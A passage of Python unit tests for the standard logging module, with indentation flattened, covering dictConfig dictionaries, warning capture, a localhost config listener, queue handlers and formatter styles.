logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
#See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no handlers are attached to the logger yet
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
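# A minimal sketch (not exercised by the tests) of how the factories above can
# be referenced from a dictConfig dictionary: a 'class' key names a handler
# class by dotted path, while a '()' key supplies an arbitrary factory, either
# a dotted-path string or an actual callable; the remaining keys (apart from
# specially handled ones such as 'formatter' and 'level') are passed to the
# factory as keyword arguments.
def demo_dictconfig_factory_config():
    return {
        'version': 1,
        'formatters': {
            'plain': {'()': formatFunc, 'format': '%(message)s'},
        },
        'handlers': {
            'out': {'()': handlerFunc, 'formatter': 'plain'},
        },
        'root': {'level': 'WARNING', 'handlers': ['out']},
    }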
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since the handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
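# --- Illustrative sketch (not part of the test suite) ---
# A hypothetical helper showing the pattern the tests above exercise: application code
# logs through a QueueHandler while a single QueueListener forwards records to the real
# handlers on its own thread. The name _queue_logging_sketch and logger name 'sketch'
# are illustrative only; nothing here is invoked by the tests.
def _queue_logging_sketch():
    q = queue.Queue(-1)
    sketch_logger = logging.getLogger('sketch')
    sketch_logger.addHandler(logging.handlers.QueueHandler(q))
    listener = logging.handlers.QueueListener(q, logging.StreamHandler())
    listener.start()
    try:
        sketch_logger.warning('handled off the calling thread')
    finally:
        listener.stop()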
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
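# 'utc' above is a minimal fixed-offset tzinfo; FormatterTest.test_time uses it below to
# build a timezone-aware reference datetime when checking asctime formatting.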
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
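# The three style markers exercised above map onto logging.PercentStyle ('%'),
# logging.StrFormatStyle ('{') and logging.StringTemplateStyle ('$'); any other marker
# makes the Formatter constructor raise ValueError, as checked here.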
def test_time(self):
r = self.get_record()
